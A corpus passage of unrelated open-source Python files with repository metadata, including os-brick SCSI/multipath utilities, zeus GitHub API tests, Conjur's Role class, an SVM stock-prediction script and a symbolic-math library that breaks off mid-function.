break
if disk is None:
raise RuntimeError('failed to find disk service instance')
rc, out, err = cuisine.core.run("btrfs device add /dev/{devicename} {mountpoint}".format(devicename=disk.model.data.devicename, mountpoint=service.model.data.mount))
if rc != 0:
raise RuntimeError("Couldn't add device to /data")
| Jumpscale/ays_jumpscale8 | templates/fs/fs.btrfs/actions.py | Python | apache-2.0 | 4,712 |
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.parametrics import ParametricRunControl
log = logging.getLogger(__name__)
class TestParametricRunControl(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_parametricruncontrol(self):
pyidf.validation_level = ValidationLevel.error
obj = ParametricRunControl()
# alpha
var_name = "Name"
obj.name = var_name
paras = []
var_perform_run_1 = "Yes"
paras.append(var_perform_run_1)
obj.add_extensible(*paras)
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.parametricruncontrols[0].name, var_name)
index = obj.extensible_field_index("Perform Run 1")
self.assertEqual(idf2.parametricruncontrols[0].extensibles[0][index], var_perform_run_1) | rbuffat/pyidf | tests/test_parametricruncontrol.py | Python | apache-2.0 | 1,196 |
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic linux scsi subsystem and Multipath utilities.
Note, this is not iSCSI.
"""
import os
import re
from oslo_concurrency import processutils as putils
from oslo_log import log as logging
from os_brick import exception
from os_brick import executor
from os_brick.i18n import _LW
from os_brick import utils
LOG = logging.getLogger(__name__)
MULTIPATH_ERROR_REGEX = re.compile("\w{3} \d+ \d\d:\d\d:\d\d \|.*$")
MULTIPATH_WWID_REGEX = re.compile("\((?P<wwid>.+)\)")
class LinuxSCSI(executor.Executor):
def __init__(self, root_helper, execute=putils.execute,
*args, **kwargs):
super(LinuxSCSI, self).__init__(root_helper, execute,
*args, **kwargs)
def echo_scsi_command(self, path, content):
"""Used to echo strings to scsi subsystem."""
args = ["-a", path]
kwargs = dict(process_input=content,
run_as_root=True,
root_helper=self._root_helper)
self._execute('tee', *args, **kwargs)
def get_name_from_path(self, path):
"""Translates /dev/disk/by-path/ entry to /dev/sdX."""
name = os.path.realpath(path)
if name.startswith("/dev/"):
return name
else:
return None
def remove_scsi_device(self, device):
"""Removes a scsi device based upon /dev/sdX name."""
path = "/sys/block/%s/device/delete" % device.replace("/dev/", "")
if os.path.exists(path):
# flush any outstanding IO first
self.flush_device_io(device)
LOG.debug("Remove SCSI device %(device)s with %(path)s",
{'device': device, 'path': path})
self.echo_scsi_command(path, "1")
@utils.retry(exceptions=exception.VolumePathNotRemoved, retries=3,
backoff_rate=1)
def wait_for_volume_removal(self, volume_path):
"""This is used to ensure that volumes are gone."""
LOG.debug("Checking to see if SCSI volume %s has been removed.",
volume_path)
if os.path.exists(volume_path):
LOG.debug("%(path)s still exists.", {'path': volume_path})
raise exception.VolumePathNotRemoved(
volume_path=volume_path)
else:
LOG.debug("SCSI volume %s has been removed.", volume_path)
def get_device_info(self, device):
(out, _err) = self._execute('sg_scan', device, run_as_root=True,
root_helper=self._root_helper)
dev_info = {'device': device, 'host': None,
'channel': None, 'id': None, 'lun': None}
if out:
line = out.strip()
line = line.replace(device + ": ", "")
info = line.split(" ")
for item in info:
if '=' in item:
pair = item.split('=')
dev_info[pair[0]] = pair[1]
elif 'scsi' in item:
dev_info['host'] = item.replace('scsi', '')
return dev_info
def remove_multipath_device(self, multipath_name):
"""This removes LUNs associated with a multipath device
and the multipath device itself.
"""
LOG.debug("remove multipath device %s", multipath_name)
mpath_dev = self.find_multipath_device(multipath_name)
if mpath_dev:
devices = mpath_dev['devices']
LOG.debug("multipath LUNs to remove %s", devices)
for device in devices:
self.remove_scsi_device(device['device'])
self.flush_multipath_device(mpath_dev['id'])
def flush_device_io(self, device):
"""This is used to flush any remaining IO in the buffers."""
try:
LOG.debug("Flushing IO for device %s", device)
self._execute('blockdev', '--flushbufs', device, run_as_root=True,
root_helper=self._root_helper)
except putils.ProcessExecutionError as exc:
LOG.warning(_LW("Failed to flush IO buffers prior to removing "
"device: %(code)s"), {'code': exc.exit_code})
def flush_multipath_device(self, device):
try:
LOG.debug("Flush multipath device %s", device)
self._execute('multipath', '-f', device, run_as_root=True,
root_helper=self._root_helper)
except putils.ProcessExecutionError as exc:
LOG.warning(_LW("multipath call failed exit %(code)s"),
{'code': exc.exit_code})
def flush_multipath_devices(self):
try:
self._execute('multipath', '-F', run_as_root=True,
root_helper=self._root_helper)
except putils.ProcessExecutionError as exc:
LOG.warning(_LW("multipath call failed exit %(code)s"),
{'code': exc.exit_code})
def find_multipath_device(self, device):
"""Find a multipath device associated with a LUN device name.
device can be either a /dev/sdX entry or a multipath id.
"""
mdev = None
devices = []
out = None
try:
(out, _err) = self._execute('multipath', '-l', device,
run_as_root=True,
root_helper=self._root_helper)
except putils.ProcessExecutionError as exc:
LOG.warning(_LW("multipath call failed exit %(code)s"),
{'code': exc.exit_code})
return None
if out:
lines = out.strip()
lines = lines.split("\n")
lines = [line for line in lines
if not re.match(MULTIPATH_ERROR_REGEX, line)]
if lines:
# Use the device name, be it the WWID, mpathN or custom alias
# of a device to build the device path. This should be the
# first item on the first line of output from `multipath -l
# ${path}` or `multipath -l ${wwid}`..
mdev_name = lines[0].split(" ")[0]
mdev = '/dev/mapper/%s' % mdev_name
# Find the WWID for the LUN if we are using mpathN or aliases.
wwid_search = MULTIPATH_WWID_REGEX.search(lines[0])
if wwid_search is not None:
mdev_id = wwid_search.group('wwid')
else:
mdev_id = mdev_name
# Confirm that the device is present.
try:
os.stat(mdev)
except OSError:
LOG.warn(_LW("Couldn't find multipath device %s"), mdev)
return None
LOG.debug("Found multipath device = %(mdev)s",
{'mdev': mdev})
device_lines = lines[3:]
for dev_line in device_lines:
if dev_line.find("policy") != -1:
continue
dev_line = dev_line.lstrip(' |-`')
dev_info = dev_line.split()
address = dev_info[0].split(":")
dev = {'device': '/dev/%s' % dev_info[1],
'host': address[0], 'channel': address[1],
'id': address[2], 'lun': address[3]
}
devices.append(dev)
if mdev is not None:
info = {"device": mdev,
"id": mdev_id,
"name": mdev_name,
"devices": devices}
return info
return None
| citrix-openstack-build/os-brick | os_brick/initiator/linuxscsi.py | Python | apache-2.0 | 8,320 |
import sys
import os.path
from logging import ERROR, WARN, INFO, DEBUG
import time
try:
import datablox_framework
except ImportError:
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),
"../../datablox_framework")))
import datablox_framework
from datablox_framework.block import *
from datablox_framework.shard import *
class web_crawler_shard(Shard):
@classmethod
def initial_configs(cls, config):
return [config for i in range(config["nodes"])]
@classmethod
def node_type(self):
return {"name": "Web-Crawler", "input_port": "input", "output_port": "output", "port_type": "PUSH"}
def on_load(self, config):
self.config = config
self.nodes = config["nodes"]
self.max_nodes = 20
self.current_node = 0
self.add_port("input", Port.PUSH, Port.UNNAMED, ["internet_url"])
self.add_port("rpc", Port.QUERY, Port.UNNAMED, ["internet_url"])
self.log(INFO, "Web crawler shard loaded")
def config_for_new_node(self):
return self.config
def recv_push(self, port, log):
self.log(INFO, "%s sending to port %d" % (self.id, self.current_node))
self.push_node(self.current_node, log)
self.current_node = (self.current_node + 1) % self.nodes
def can_add_node(self):
return (self.nodes < self.max_nodes)
def should_add_node(self, node_num):
self.log(INFO, self.id + " should_add_node got a new node")
self.nodes += 1
# start distribution from the new node
self.current_node = node_num
def recv_query(self, port, log):
self.log(INFO, "%s sending to port %d" % (self.id, self.current_node))
self.push_node(self.current_node, log)
self.current_node = (self.current_node + 1) % self.nodes
ret = Log()
ret.log["result"] = True
self.return_query_res(port, ret)
| mpi-sws-rse/datablox | blox/web_crawler_shard__1_0/b_web_crawler_shard.py | Python | apache-2.0 | 1,854 |
import responses
from zeus.constants import Permission
from zeus.models import (
Repository,
RepositoryAccess,
RepositoryBackend,
RepositoryProvider,
)
REPO_DETAILS_RESPONSE = """{
"id": 1,
"full_name": "getsentry/zeus",
"clone_url": "https://github.com/getsentry/zeus.git",
"ssh_url": "[email protected]:getsentry/zeus.git",
"permissions": {
"admin": true
}
}"""
REPO_LIST_RESPONSE = """[{
"id": 1,
"full_name": "getsentry/zeus",
"clone_url": "https://github.com/getsentry/zeus.git",
"ssh_url": "[email protected]:getsentry/zeus.git",
"permissions": {
"admin": true
}
}]"""
KEY_RESPONSE = """{
"id": 1,
"key": "ssh-rsa AAA...",
"url": "https://api.github.com/repos/getsentry/zeus/keys/1",
"title": "zeus",
"verified": true,
"created_at": "2014-12-10T15:53:42Z",
"read_only": true
}"""
def test_new_repository_github(
client, mocker, default_login, default_user, default_identity
):
responses.add(
"GET",
"https://api.github.com/repos/getsentry/zeus",
match_querystring=True,
body=REPO_DETAILS_RESPONSE,
)
responses.add(
"POST", "https://api.github.com/repos/getsentry/zeus/keys", body=KEY_RESPONSE
)
resp = client.post("/api/github/repos", json={"name": "getsentry/zeus"})
assert resp.status_code == 201
data = resp.json()
assert data["id"]
repo = Repository.query.unrestricted_unsafe().get(data["id"])
assert repo.url == "[email protected]:getsentry/zeus.git"
assert repo.backend == RepositoryBackend.git
assert repo.provider == RepositoryProvider.github
assert repo.external_id == "1"
assert repo.data == {"full_name": "getsentry/zeus"}
access = list(
RepositoryAccess.query.filter(RepositoryAccess.repository_id == repo.id)
)
assert len(access) == 1
assert access[0].user_id == default_user.id
assert access[0].permission == Permission.admin
def test_deactivate_repository_github(
client, mocker, default_login, default_repo, default_repo_access
):
mock_delay = mocker.patch("zeus.config.celery.delay")
resp = client.delete(
"/api/github/repos",
json={"name": "{}/{}".format(default_repo.owner_name, default_repo.name)},
)
assert resp.status_code == 202
mock_delay.assert_called_once_with(
"zeus.delete_repo", repository_id=default_repo.id
)
def test_deactivate_non_existing_repository_github(client, default_login):
resp = client.delete("/api/github/repos", json={"name": "getsentry/does-not-exist"})
assert resp.status_code == 404
assert "not found" in resp.json()["message"]
def test_list_github_repos(client, default_login, default_user, default_identity):
responses.add(
"GET",
"https://api.github.com/user/repos?type=owner",
match_querystring=True,
body=REPO_LIST_RESPONSE,
)
resp = client.get("/api/github/repos")
assert resp.status_code == 200
data = resp.json()
assert len(data) == 1
assert data[0]["name"] == "getsentry/zeus"
assert not data[0]["status"]
assert data[0]["permissions"]["admin"]
assert data[0]["permissions"]["read"]
assert data[0]["permissions"]["write"]
def test_list_github_active_repo_within_scope(
client,
default_login,
default_user,
default_identity,
default_repo,
default_repo_access,
):
responses.add(
"GET",
"https://api.github.com/user/repos?type=owner",
match_querystring=True,
body=REPO_LIST_RESPONSE,
)
resp = client.get("/api/github/repos")
assert resp.status_code == 200
data = resp.json()
assert len(data) == 1
assert data[0]["name"] == "getsentry/zeus"
assert data[0]["status"] == "active"
def test_list_github_active_repo_out_of_scope(
client, default_login, default_user, default_identity, default_repo
):
responses.add(
"GET",
"https://api.github.com/user/repos?type=owner",
match_querystring=True,
body=REPO_LIST_RESPONSE,
)
resp = client.get("/api/github/repos")
assert resp.status_code == 200
data = resp.json()
assert len(data) == 1
assert data[0]["name"] == "getsentry/zeus"
assert not data[0]["status"]
| getsentry/zeus | tests/zeus/api/resources/test_github_repositories.py | Python | apache-2.0 | 4,294 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import talib
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 30)
pd.set_option('precision', 7)
pd.options.display.float_format = '{:,.3f}'.format
import warnings
warnings.simplefilter(action = "ignore", category = FutureWarning)
from sklearn import preprocessing, svm, cross_validation, metrics, pipeline, grid_search
from scipy.stats import sem
from sklearn.decomposition import PCA, KernelPCA
'''
读入一支股票指定年份的ohlcv数据
输入:baseDir,stockCode为字符, startYear,yearNum为整数,
输出:dataframe
'''
def readWSDFile(baseDir, stockCode, startYear, yearNum=1):
# 解析日期
dateparse = lambda x: pd.datetime.strptime(x, '%Y-%m-%d').date()
df = 0
for i in range(yearNum):
tempDF = pd.read_csv(baseDir+stockCode+'/wsd_'+stockCode+'_'+str(startYear+i)+'.csv',
index_col=0, sep='\t', usecols=[0,2,3,4,5,6,7,9,10,12,15], header=None,
skiprows=1, names=['Date','Open','High','Low','Close','Volume','Amount',
'Chg','Chg Pct','Avg','Turn'],
parse_dates=True, date_parser=dateparse)
if i==0: df = tempDF
else: df = df.append(tempDF)
return df
usecols = [0, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 33, 34, 36, 37]
usecols = [0, 6, 16, 17, 24, 31]
def readWSDIndexFile(baseDir, stockCode, startYear, yearNum=1):
# 解析日期
dateparse = lambda x: pd.datetime.strptime(x, '%Y-%m-%d').date()
df = 0
for i in range(yearNum):
tempDF = pd.read_csv(baseDir+'I'+stockCode+'/wsd_'+stockCode+'_'+str(startYear+i)+'.csv',
index_col=0, sep=',', parse_dates=True, date_parser=dateparse, usecols=usecols)
if i==0: df = tempDF
else: df = df.append(tempDF)
return df
def prepareData(df, dfi, win=5):
# open(开盘价均值),high(最高价均值),low(最低价均值),volume(成交量均值),amount(成交额均值),
# change(涨跌均值),changePct(涨跌幅均值),average(均价均值),turn(换手率均值),
# r(收益率均值),
# 38种技术指标
open = pd.rolling_mean(df['Open'], window=win)
high = pd.rolling_mean(df['High'], window=win)
low = pd.rolling_mean(df['Low'], window=win)
volume = pd.rolling_mean(df['Volume'], window=win)
amount = pd.rolling_mean(df['Amount'], window=win)
change = pd.rolling_mean(df['Chg'], window=win)
changePct = pd.rolling_mean(df['Chg Pct'], window=win)
average = pd.rolling_mean(df['Avg'], window=win)
turn = pd.rolling_mean(df['Turn'], window=win)
dailyreturn = df['Close'].pct_change()
dailyreturn[0] = dailyreturn[1]
r = pd.rolling_mean(dailyreturn, window=win)
techDF = pd.rolling_mean(dfi, window=win)
tempX = np.column_stack((open[win-1:], high[win-1:], low[win-1:], volume[win-1:], amount[win-1:],
change[win-1:], changePct[win-1:], average[win-1:], turn[win-1:], r[win-1:]))
X = np.hstack((tempX, techDF.values[win-1:]))
y = []
for i in range(win-1, len(dailyreturn)):
if dailyreturn[i]<0: y.append(-1)
elif dailyreturn[i]>0: y.append(1)
else: y.append(y[-1]) # 按前一个值填充
return X, y
def optimizeSVM(X_norm, y, kFolds=10):
clf = pipeline.Pipeline([
('svc', svm.SVC(kernel='rbf')),
])
# grid search 多参数优化
parameters = {
# 'svc__gamma': np.logspace(-1, 3, 20),
# 'svc__C': np.logspace(-1, 3, 10),
# 'svc__gamma': np.logspace(-3, 11, 8, base=2),
# 'svc__C': np.logspace(-3, 15, 10, base=2),
'svc__gamma': np.logspace(-3, 11, 8, base=2),
'svc__C': np.logspace(-3, 15, 10, base=2),
}
gs = grid_search.GridSearchCV(clf, parameters, verbose=1, refit=False, cv=kFolds)
gs.fit(X_norm, y)
return gs.best_params_['svc__gamma'], gs.best_params_['svc__C'], gs.best_score_
def plot3D(X_pca, y):
red_x, red_y, red_z = [], [], []
blue_x, blue_y, blue_z = [], [], []
for i in range(len(X_pca)):
if y[i]==-1:
red_x.append(X_pca[i][0])
red_y.append(X_pca[i][1])
red_z.append(X_pca[i][2])
elif y[i]==1:
blue_x.append(X_pca[i][0])
blue_y.append(X_pca[i][1])
blue_z.append(X_pca[i][2])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(red_x, red_y, red_z, c='r', marker='x')
ax.scatter(blue_x, blue_y, blue_z, c='g', marker='.')
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
plt.show()
baseDir = '/Users/eugene/Downloads/data/'
stockCodes = ['000300.SH', '000016.SH', '000905.SH']
i = 0
startYear = 2014
number = 2
df = readWSDFile(baseDir, stockCodes[i], startYear, number)
print 'Day count:', len(df)
# print df.head(5)
dfi = readWSDIndexFile(baseDir, stockCodes[i], startYear, number)
X, y = prepareData(df, dfi, win=12)
print np.shape(X), np.shape(y)
# print np.shape(X)
normalizer = preprocessing.Normalizer().fit(X) # fit does nothing
X_norm = normalizer.transform(X)
# estimator = PCA(n_components=10)
# estimator_kernel = KernelPCA(n_components=12, kernel='rbf')
# # X_pca = estimator.fit_transform(X_norm)
# X_pca = estimator_kernel.fit_transform(X_norm)
# plot3D(X_pca, y)
# grid search 多参数优化
gamma, C, score = optimizeSVM(X_norm, y, kFolds=10)
print 'gamma=',gamma, 'C=',C, 'score=',score | Ernestyj/PyStudy | finance/DaysTest/DaysDataPrepareOld.py | Python | apache-2.0 | 5,771 |
#
# Copyright (C) 2014 Conjur Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from conjur.util import urlescape, authzid
from conjur.exceptions import ConjurException
import logging
class Role(object):
"""
Represents a Conjur [role](https://developer.conjur.net/key_concepts/rbac.html#rbac-roles).
An instance of this class does not know whether the role in question exists.
Generally you should create instances of this class through the `conjur.API.role` method,
or the `Role.from_roleid` classmethod.
Roles can provide information about their members and can check whether the role they represent
is allowed to perform certain operations on resources.
`conjur.User` and `conjur.Group` objects have `role` members that reference the role corresponding
to that Conjur asset.
"""
def __init__(self, api, kind, identifier):
"""
Create a role to represent the Conjur role with id `<kind>:<identifier>`. For
example, to represent the role associated with a user named bob,
role = Role(api, 'user', 'bob')
`api` must be a `conjur.API` instance, used to implement this classes interactions with Conjur
`kind` is a string giving the role kind
`identifier` is the unqualified identifier of the role.
"""
self.api = api
"""
The `conjur.API` instance used to implement our methods.
"""
self.kind = kind
"""
The `kind` portion of the role's id.
"""
self.identifier = identifier
"""
The `identifier` portion of the role's id.
"""
@classmethod
def from_roleid(cls, api, roleid):
"""
Creates an instance of `conjur.Role` from a full role id string.
`api` is an instance of `conjur.API`
`roleid` is a fully or partially qualified Conjur identifier, for example,
`"the-account:service:some-service"` or `"service:some-service"` resolve to the same role.
"""
tokens = authzid(roleid, 'role').split(':', 3)
if len(tokens) == 3:
tokens.pop(0)
return cls(api, *tokens)
@property
def roleid(self):
"""
Return the full role id as a string.
Example:
>>> role = api.role('user', 'bob')
>>> role.roleid
'the-account:user:bob'
"""
return ':'.join([self.api.config.account, self.kind, self.identifier])
def is_permitted(self, resource, privilege):
"""
Check whether `resource` has `privilege` on this role.
`resource` is a qualified identifier for the resource.
`privilege` is a string like `"update"` or `"execute"`.
Example:
>>> role = api.role('user', 'alice')
>>> if role.is_permitted('variable:db-password', 'execute'):
... print("Alice can fetch the database password")
... else:
... print("Alice cannot fetch the database password")
"""
params = {
'check': 'true',
'resource_id': authzid(resource, 'resource'),
'privilege': privilege
}
response = self.api.get(self._url(), params=params,
check_errors=False)
if response.status_code == 204:
return True
elif response.status_code in (403, 404):
return False
else:
raise ConjurException("Request failed: %d" % response.status_code)
def grant_to(self, member, admin=None):
"""
Grant this role to `member`.
`member` is a string or object with a `role` attribute or `roleid` method,
such as a `conjur.User` or `conjur.Group`.
`admin` whether the member can grant this role to others.
"""
data = {}
if admin is not None:
data['admin'] = 'true' if admin else 'false'
self.api.put(self._membership_url(member), data=data)
def revoke_from(self, member):
"""
The inverse of `conjur.Role.grant_to`. Removes `member` from the members of this
role.
`member` is a string or object with a `role` attribute or `roleid` method,
such as a `conjur.User` or `conjur.Group`.
"""
self.api.delete(self._membership_url(member))
def members(self):
"""
Return a list of members of this role. Members are returned as `dict`s
with the following keys:
* `'member'` the fully qualified identifier of the group
* `'role'` the fully qualified identifier of the group (redundant)
* `'grantor'` the role that granted the membership
* `'admin_option'` whether this member can grant membership in the group to other roles.
"""
return self.api.get(self._membership_url()).json()
def _membership_url(self, member=None):
url = self._url() + "?members"
if member is not None:
memberid = authzid(member, 'role')
url += "&member=" + urlescape(memberid)
return url
def _url(self, *args):
return "/".join([self.api.config.authz_url,
self.api.config.account,
'roles',
self.kind,
self.identifier] + list(args))
| conjurinc/api-python | conjur/role.py | Python | apache-2.0 | 6,400 |
from copy import deepcopy
from geom import geom
import numpy as np
import pandas as pd
class geom_jitter(geom):
VALID_AES = ['jitter']
def __radd__(self, gg):
gg = deepcopy(gg)
xcol = gg.aesthetics.get("x")
ycol = gg.aesthetics.get("y")
x = gg.data[xcol]
y = gg.data[ycol]
x = x * np.random.uniform(.9, 1.1, len(x))
y = y * np.random.uniform(.9, 1.1, len(y))
gg.data[xcol] = x
gg.data[ycol] = y
return gg
def plot_layer(self, layer):
pass
| hadley/ggplot | ggplot/geoms/geom_jitter.py | Python | bsd-2-clause | 542 |
class ConstraintFailureException(Exception):
pass
| tmaiwald/OSIM | OSIM/Optimizations/ConstraintFailureException.py | Python | bsd-2-clause | 55 |
#!/usr/bin/env python
# this only exists because sympy crashes IDAPython
# for general use sympy is much more complete
import traceback
import types
import copy
import operator
import random
import string
from memoize import Memoize
import numpy
import util
def collect(exp, fn):
rv = set()
def _collect(exp):
if fn(exp):
rv.add(exp)
return exp
exp.walk(_collect)
return rv
def _replace_one(expr, match, repl):
vals = WildResults()
if expr.match(match, vals):
expr = repl.substitute({wilds(w): vals[w] for w in vals})
if len(expr) > 1:
return expr[0](*[_replace_one(x, match, repl) for x in expr.args])
else:
return expr
def replace(expr, d, repeat=True):
while True:
old_expr = expr
for k in d:
expr = _replace_one(expr, k, d[k])
if old_expr == expr or not repeat:
return expr
class _Symbolic(tuple):
def match(self, other, valuestore=None):
'''
matches against a pattern, use wilds() to generate wilds
Example:
a,b = wilds('a b')
val = WildsResults()
if exp.match(a(b + 4), val):
print val.a
print val.b
'''
import match
return match.match(self, other, valuestore)
def __hash__(self):
return hash(self.name)
def simplify(self):
import simplify
return simplify.simplify(self)
def walk(self, *fns):
if len(fns) > 1:
def _(exp):
for f in fns:
exp = f(exp)
return exp
return self.walk(_)
exp = self
fn = fns[0]
if len(exp) == 1:
oldexp = exp
exp = fn(exp)
while exp != oldexp:
oldexp = exp
exp = fn(exp)
else:
args = list(map(lambda x: x.walk(fn), exp.args))
oldexp = self
exp = fn(fn(exp[0])(*args))
#while exp != oldexp:
# print '%s => %s' % (oldexp, exp)
# oldexp = exp
# exp = exp.walk(fn)
if util.DEBUG and exp != self:
#print '%s => %s (%s)' % (self, exp, fn)
pass
return exp
def _dump(self):
return {
'name': self.name,
'id': id(self)
}
def __contains__(self, exp):
rv = {}
rv['val'] = False
def _(_exp):
if _exp.match(exp):
rv['val'] = True
return _exp
self.walk(_)
return rv['val']
def substitute(self, subs):
'''
takes a dictionary of substitutions
returns itself with substitutions made
'''
if self in subs:
self = subs[self]
return self
def compile(self, *arguments):
'''compiles a symbolic expression with arguments to a python function'''
def _compiled_func(*args):
assert len(args) == len(arguments)
argdic = {}
for i in range(len(args)):
argdic[arguments[i]] = args[i]
rv = self.substitute(argdic).simplify()
return desymbolic(rv)
return _compiled_func
def __eq__(self, other):
#return type(self) == type(other) and self.name == other.name
return id(self) == id(other)
def __ne__(self, other):
return not self.__eq__(other)
def __getitem__(self, num):
if num == 0:
return self
raise BaseException("Invalid index")
def __len__(self):
return 1
# comparison operations notice we don't override __eq__
def __gt__(self, obj):
return Fn.GreaterThan(self, obj)
def __ge__(self, obj):
return Fn.GreaterThanEq(self, obj)
def __lt__(self, obj):
return Fn.LessThan(self, obj)
def __le__(self, obj):
return Fn.LessThanEq(self, obj)
# arithmetic overrides
def __mul__(self, other):
return Fn.Mul(self, other)
def __pow__(self, other):
return Fn.Pow(self, other)
def __rpow__(self, other):
return Fn.Pow(other, self)
def __div__(self, other):
return Fn.Div(self, other)
def __add__(self, other):
return Fn.Add(self, other)
def __sub__(self, other):
return Fn.Sub(self, other)
def __or__(self, other):
return Fn.BitOr(self, other)
def __and__(self, other):
return Fn.BitAnd(self, other)
def __xor__(self, other):
return Fn.BitXor(self, other)
def __rmul__(self, other):
return Fn.Mul(other, self)
def __rdiv__(self, other):
return Fn.Div(other, self)
def __radd__(self, other):
return Fn.Add(other, self)
def __rsub__(self, other):
return Fn.Sub(other, self)
def __ror__(self, other):
return Fn.BitOr(other, self)
def __rand__(self, other):
return Fn.BitAnd(other, self)
def __rxor__(self, other):
return Fn.BitXor(other, self)
def __rshift__(self, other):
return Fn.RShift(self, other)
def __lshift__(self, other):
return Fn.LShift(self, other)
def __rrshift__(self, other):
return Fn.RShift(other, self)
def __rlshift__(self, other):
return Fn.LShift(other, self)
def __neg__(self):
return self * -1
class _KnownValue(_Symbolic):
def value(self):
raise BaseException('not implemented')
class Boolean(_KnownValue):
@Memoize
def __new__(typ, b):
self = _KnownValue.__new__(typ)
self.name = str(b)
self.boolean = b
return self
def value(self):
return bool(self.boolean)
def __str__(self):
return str(self.boolean)
def __repr__(self):
return str(self)
def __eq__(self, other):
if isinstance(other, Boolean):
return bool(self.boolean) == bool(other.boolean)
elif isinstance(other, _Symbolic):
return other.__eq__(self)
else:
return bool(self.boolean) == other
class Number(_KnownValue):
IFORMAT = str
FFORMAT = str
@Memoize
def __new__(typ, n):
n = float(n)
self = _KnownValue.__new__(typ)
self.name = str(n)
self.n = n
return self
@property
def is_integer(self):
return self.n.is_integer()
def value(self):
return self.n
def __eq__(self, other):
if isinstance(other, Number):
return self.n == other.n
elif isinstance(other, _Symbolic):
return other.__eq__(self)
else:
return self.n == other
def __ne__(self, other):
if isinstance(other, _Symbolic):
return super(Number, self).__ne__(other)
else:
return self.n != other
def __str__(self):
if self.n.is_integer():
return Number.IFORMAT(int(self.n))
else:
return Number.FFORMAT(self.n)
def __repr__(self):
return str(self)
class WildResults(object):
def __init__(self):
self._hash = {}
def clear(self):
self._hash.clear()
def __setitem__(self, idx, val):
self._hash.__setitem__(idx, val)
def __contains__(self, idx):
return idx in self._hash
def __getitem__(self, idx):
return self._hash[idx]
def __getattr__(self, idx):
return self[idx]
def __iter__(self):
return self._hash.__iter__()
def __str__(self):
return str(self._hash)
def __repr__(self):
return str(self)
def __len__(self):
return len(self._hash)
class Wild(_Symbolic):
'''
wilds will be equal to anything, and are used for pattern matching
'''
@Memoize
def __new__(typ, name, **kargs):
self = _Symbolic.__new__(typ)
self.name = name
self.kargs = kargs
return self
def __str__(self):
return self.name
def __repr__(self):
return str(self)
def __call__(self, *args):
return Fn(self, *args)
def _dump(self):
return {
'type': type(self),
'name': self.name,
'kargs': self.kargs,
'id': id(self)
}
class Symbol(_Symbolic):
'''
symbols with the same name and kargs will be equal
(and in fact are guaranteed to be the same instance)
'''
@Memoize
def __new__(typ, name, **kargs):
self = Wild.__new__(typ, name)
self.name = name
self.kargs = kargs
self.is_integer = False # set to true to force domain to integers
self.is_bitvector = 0 # set to the size of the bitvector if it is a bitvector
self.is_bool = False # set to true if the symbol represents a boolean value
return self
def __str__(self):
return self.name
def __repr__(self):
return str(self)
def __call__(self, *args):
return Fn(self, *args)
def _dump(self):
return {
'type': type(self),
'name': self.name,
'kargs': self.kargs,
'id': id(self)
}
class Fn(_Symbolic):
@Memoize
def __new__(typ, fn, *args):
'''
arguments: Function, *arguments, **kargs
valid keyword args:
commutative (default False) - order of operands is unimportant
'''
if None in args:
raise BaseException('NONE IN ARGS %s %s' % (fn, args))
if not isinstance(fn, _Symbolic):
fn = symbolic(fn)
return Fn.__new__(typ, fn, *args)
for i in args:
if not isinstance(i, _Symbolic):
args = list(map(symbolic, args))
return Fn.__new__(typ, fn, *args)
self = _Symbolic.__new__(typ)
kargs = fn.kargs
self.kargs = fn.kargs
self.name = fn.name
self.fn = fn
self.args = args
#import simplify
#rv = simplify.simplify(self)
return self
def _dump(self):
return {
'id': id(self),
'name': self.name,
'fn': self.fn._dump(),
'kargs': self.kargs,
'args': list(map(lambda x: x._dump(), self.args)),
'orig kargs': self.orig_kargs,
'orig args': list(map(lambda x: x._dump(), self.orig_args))
}
def __call__(self, *args):
return Fn(self, *args)
def substitute(self, subs):
args = list(map(lambda x: x.substitute(subs), self.args))
newfn = self.fn.substitute(subs)
self = Fn(newfn, *args)
if self in subs:
self = subs[self]
return self
def recursive_substitute(self, subs):
y = self
while True:
x = y.substitute(subs)
if x == y:
return x
y = x
def __getitem__(self, n):
if n == 0:
return self.fn
return self.args[n - 1]
def __len__(self):
return len(self.args) + 1
def _get_assoc_arguments(self):
import simplify
rv = []
args = list(self.args)
def _(a, b):
